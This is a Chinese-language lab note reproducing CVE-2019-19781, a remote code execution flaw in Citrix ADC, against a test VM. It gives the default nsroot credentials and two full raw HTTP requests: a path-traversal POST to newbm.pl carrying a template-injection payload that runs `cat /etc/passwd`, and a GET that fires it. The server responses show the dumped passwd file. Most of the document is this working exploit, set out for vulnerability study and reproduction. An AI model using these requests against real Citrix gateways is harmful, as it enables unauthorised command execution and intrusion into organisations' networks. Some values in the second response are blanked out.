CVE-2019-19781 Citrix ADC 遠程程式碼執行漏洞復現

• 2020 年 2 月 13 日
• 筆記

0x01 下載文件 NSVPX-ESX-13.0-47.22_nc_64.zip

#### https://www.citrix.com/downloads/citrix-gateway/

配置靜態ip

0x02 nmap 掃描

Scanning 192.168.3.244 [ ports]  Discovered open port /tcp on 192.168.3.244  Discovered open port /tcp on 192.168.3.244  Discovered open port /tcp on 192.168.3.244  

沒有安裝證書

http://192.168.3.244/

default password: nsroot/nsroot

0x03 上傳 xml

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1  Host: 192.168.3.244  User-Agent: 1  Connection: close  NSC_USER: ../../../netscaler/portal/templates/jas502n  NSC_NONCE: nsroot  Content-Length: 97    url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]  

HTTP/1.1 200 OK  Date: Sat, 11 Jan 2020 06:36:44 GMT  Server: Apache  X-Frame-Options: SAMEORIGIN  Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT  ETag: W/"87-59bdd52283e00"  Accept-Ranges: bytes  Content-Length: 135  X-XSS-Protection: 1; mode=block  X-Content-Type-Options: nosniff  Keep-Alive: timeout=15, max=100  Connection: Keep-Alive  Content-Type: text/html; charset=UTF-8    <HTML>  <BODY>  <SCRIPT language=javascript type=text/javascript>  //parent.window.ns_reload();  window.close();  </SCRIPT>  </BODY>  </HTML>  

0x04 執行命令

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1  Host: 192.168.3.244  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  Accept-Encoding: gzip, deflate  Connection: close  NSC_USER: nsroot  NSC_NONCE: nsroot  Upgrade-Insecure-Requests: 1  Cache-Control: max-age=0  

HTTP/1.1  OK  Date: Sat,  Jan  :: GMT  Server: Apache  X-Frame-Options: SAMEORIGIN  Pragma: no-cache  Cache-control: no-cache  X-XSS-Protection: ; mode=block  X-Content-Type-Options: nosniff  Keep-Alive: timeout=, max=  Connection: Keep-Alive  Content-Type: text/html; charset=UTF-  Expires: Sat,  Jan  :: GMT  Content-Length:    # $FreeBSD: release/8.4./etc/master.passwd  -- ::Z rwatson $  #  root:*:::Charlie &:/root:/usr/bin/bash  nsroot:*:::Netscaler Root:/root:/netscaler/nssh  daemon:*:::Owner of many system processes:/root:/usr/sbin/nologin  operator:*:::System &:/:/usr/sbin/nologin  bin:*:::Binaries Commands and Source:/:/usr/sbin/nologin  tty:*:::Tty Sandbox:/:/usr/sbin/nologin  kmem:*:::KMem Sandbox:/:/usr/sbin/nologin  games:*:::Games pseudo-user:/usr/games:/usr/sbin/nologin  news:*:::News Subsystem:/:/usr/sbin/nologin  man:*:::Mister Man Pages:/usr/share/man:/usr/sbin/nologin  sshd:*:::Secure Shell Daemon:/var/empty:/usr/sbin/nologin  smmsp:*:::Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin  mailnull:*:::Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin  bind:*:::Bind Sandbox:/:/usr/sbin/nologin  proxy:*:::Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin  _pflogd:*:::pflogd privsep user:/var/empty:/usr/sbin/nologin  _dhcp:*:::dhcp programs:/var/empty:/usr/sbin/nologin  uucp:*:::UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin  pop:*:::Post Office Owner:/nonexistent:/usr/sbin/nologin  auditdistd:*:::Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin  www:*:::World Wide Web Owner:/nonexistent:/usr/sbin/nologin  hast:*:::HAST unprivileged user:/var/empty:/usr/sbin/nologin  nobody:*:::Unprivileged user:/nonexistent:/usr/sbin/nologin  nsmonitor:*:::Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin  undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.
  

undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.

參考鏈接

https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/